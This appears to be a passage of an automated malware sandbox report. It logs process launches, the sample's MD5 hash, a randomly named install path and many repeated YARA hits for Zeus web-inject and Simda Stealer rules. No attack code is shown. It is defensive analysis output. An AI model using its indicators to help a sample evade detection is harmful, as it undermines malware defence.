Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2644113860.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2710293683.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2640221225.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2551297845.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2491630816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2681109856.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2688837088.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2681703821.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2682799870.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2646845259.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2693850041.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2694477664.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2610885248.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2667661376.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2711656555.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2689917423.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2689093667.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2642349690.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3391913803.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2617323227.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2674089655.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2584410332.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2139570153.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2685802942.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2642126160.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2712084966.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2696066198.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2711910580.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2684054026.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2672453488.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2642540091.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2683452927.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2682237093.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2591770836.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2646105043.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2634522992.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2681497968.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2488750222.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2634738816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2710792546.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3391439892.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2643292305.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2681300847.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2509383327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2681891778.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2683874460.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2504620207.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2636504789.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2680873224.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2684684807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2643045244.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2642865814.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2562478885.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2684438036.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2712266421.000000000EE00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2671268394.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2684242011.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2650052400.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2689405360.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2643706755.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2682432522.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2522638686.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2695314934.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2666567712.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2711233354.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2649020462.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2670333858.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2638992211.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2682624187.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2683674807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:13:33
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2562028304.0000000001740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2561383940.00000000016E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:13:33
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.2554723271.0000000002FA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.2555462875.0000000003100000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:13:33
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000A.00000002.2576688656.0000000001520000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000A.00000002.2575020460.00000000014C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:13:34
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 704
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:13:34
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 736
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:13:35
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000E.00000002.2558937111.0000000002920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000E.00000002.2560722712.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:13:35
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2538477716.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2535763642.0000000002790000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:13:36
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 916
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:13:36
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3704 -s 712
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:13:36
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.2584784821.00000000027D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.2583716021.0000000002650000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:13:39
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.2606518078.00000000005E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.2610943205.0000000002340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:13:40
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 760
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:13:40
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
